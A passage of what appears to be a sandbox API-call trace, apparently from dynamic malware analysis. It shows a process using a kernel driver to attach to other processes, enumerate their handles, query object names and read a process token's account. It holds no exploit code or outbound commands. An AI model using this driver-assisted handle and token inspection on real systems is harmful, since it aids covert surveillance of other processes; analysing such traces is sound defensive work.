ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0161.690] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.690] PsReleaseProcessExitSynchronization () returned 0x2 [0161.690] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.690] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.690] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0161.690] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.690] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.690] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.690] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0161.690] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.690] PsAcquireProcessExitSynchronization () returned 0x0 [0161.690] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.691] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002039420, HandleInformation=0x0) returned 0x0 [0161.691] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.691] PsReleaseProcessExitSynchronization () returned 0x2 [0161.691] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.691] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.691] ObfDereferenceObject (Object=0xfffffa8002039420) returned 0x1 [0161.691] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.691] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.691] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.691] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.691] PsAcquireProcessExitSynchronization () returned 0x0 [0161.691] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.691] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001d34850, HandleInformation=0x0) returned 0x0 [0161.691] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.691] PsReleaseProcessExitSynchronization () returned 0x2 [0161.691] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.691] ObQueryNameString (in: Object=0xfffff8a001d34850, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.691] ObfDereferenceObject (Object=0xfffff8a001d34850) returned 0x1 [0161.691] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.692] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.692] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0161.692] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.692] PsAcquireProcessExitSynchronization () returned 0x0 [0161.692] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.692] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002041ab0, HandleInformation=0x0) returned 0x0 [0161.692] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.692] PsReleaseProcessExitSynchronization () returned 0x2 [0161.692] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.692] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d25c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d25c4, ReturnLength=0xfffff88005163508) returned 0x0 [0161.692] ObfDereferenceObject (Object=0xfffffa8002041ab0) returned 0x1 [0161.692] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.692] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.692] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.693] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.693] PsAcquireProcessExitSynchronization () returned 0x0 [0161.693] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.693] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0161.693] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.693] PsReleaseProcessExitSynchronization () returned 0x2 [0161.693] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.693] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80022c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.693] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0161.693] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.693] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xc8 [0161.693] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.693] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80021226d0, HandleInformation=0x0) returned 0x0 [0161.693] ObOpenObjectByPointer (in: Object=0xfffffa80021226d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.693] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x45 [0161.693] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0161.693] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.693] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.693] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.693] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.695] CloseHandle (hObject=0xc4) returned 1 [0161.695] CloseHandle (hObject=0xc8) returned 1 [0161.695] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.695] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0161.695] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.695] PsAcquireProcessExitSynchronization () returned 0x0 [0161.695] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.695] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800217bf20, HandleInformation=0x0) returned 0x0 [0161.696] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.696] PsReleaseProcessExitSynchronization () returned 0x2 [0161.696] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.696] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022c8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.696] ObfDereferenceObject (Object=0xfffffa800217bf20) returned 0x1 [0161.696] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.696] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.696] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.696] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.696] PsAcquireProcessExitSynchronization () returned 0x0 [0161.696] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.696] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002004070, HandleInformation=0x0) returned 0x0 [0161.696] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.696] PsReleaseProcessExitSynchronization () returned 0x2 [0161.696] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.696] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022c7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c7044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.696] ObfDereferenceObject (Object=0xfffffa8002004070) returned 0x1 [0161.696] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.696] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.698] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0161.698] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.698] PsAcquireProcessExitSynchronization () returned 0x0 [0161.698] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.698] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80023cf070, HandleInformation=0x0) returned 0x0 [0161.698] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.698] PsReleaseProcessExitSynchronization () returned 0x2 [0161.698] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.698] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80022c6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c6044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.698] ObfDereferenceObject (Object=0xfffffa80023cf070) returned 0x1 [0161.698] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.698] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.698] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.698] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.698] PsAcquireProcessExitSynchronization () returned 0x0 [0161.698] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.698] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0161.698] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.698] PsReleaseProcessExitSynchronization () returned 0x2 [0161.699] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.699] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80022c5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c5044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.699] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0161.699] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.699] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.699] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.699] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0161.699] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.699] PsAcquireProcessExitSynchronization () returned 0x0 [0161.699] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.699] ObReferenceObjectByHandle (in: Handle=0x98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800245cb50, HandleInformation=0x0) returned 0x0 [0161.699] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.699] PsReleaseProcessExitSynchronization () returned 0x2 [0161.699] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.699] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022c4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c4044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.699] ObfDereferenceObject (Object=0xfffffa800245cb50) returned 0x11 [0161.699] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.699] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.699] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.699] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.699] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.699] PsAcquireProcessExitSynchronization () returned 0x0 [0161.699] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.700] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001cee400, HandleInformation=0x0) returned 0x0 [0161.700] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.700] PsReleaseProcessExitSynchronization () returned 0x2 [0161.700] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.700] ObQueryNameString (in: Object=0xfffff8a001cee400, ObjectNameInfo=0xfffffa80022c3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c3044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.700] ObfDereferenceObject (Object=0xfffff8a001cee400) returned 0x1 [0161.700] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.700] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.700] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.700] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0161.700] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.700] PsAcquireProcessExitSynchronization () returned 0x0 [0161.702] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.702] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0161.702] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.702] PsReleaseProcessExitSynchronization () returned 0x2 [0161.702] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.702] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80022c2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c2044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.702] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0161.702] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.702] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.702] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.703] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0161.703] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.703] PsAcquireProcessExitSynchronization () returned 0x0 [0161.703] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.703] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0161.703] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.703] PsReleaseProcessExitSynchronization () returned 0x2 [0161.703] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.703] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80022ca044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022ca044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.703] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0161.703] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.703] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.703] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.703] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.703] PsAcquireProcessExitSynchronization () returned 0x0 [0161.703] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.703] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001ad4790, HandleInformation=0x0) returned 0x0 [0161.704] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.704] PsReleaseProcessExitSynchronization () returned 0x2 [0161.704] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.704] ObQueryNameString (in: Object=0xfffff8a001ad4790, ObjectNameInfo=0xfffffa80022cb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022cb044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.704] ObfDereferenceObject (Object=0xfffff8a001ad4790) returned 0x1 [0161.704] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.704] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.704] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.704] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0161.704] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.704] PsAcquireProcessExitSynchronization () returned 0x0 [0161.704] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.704] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002432390, HandleInformation=0x0) returned 0x0 [0161.704] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.704] 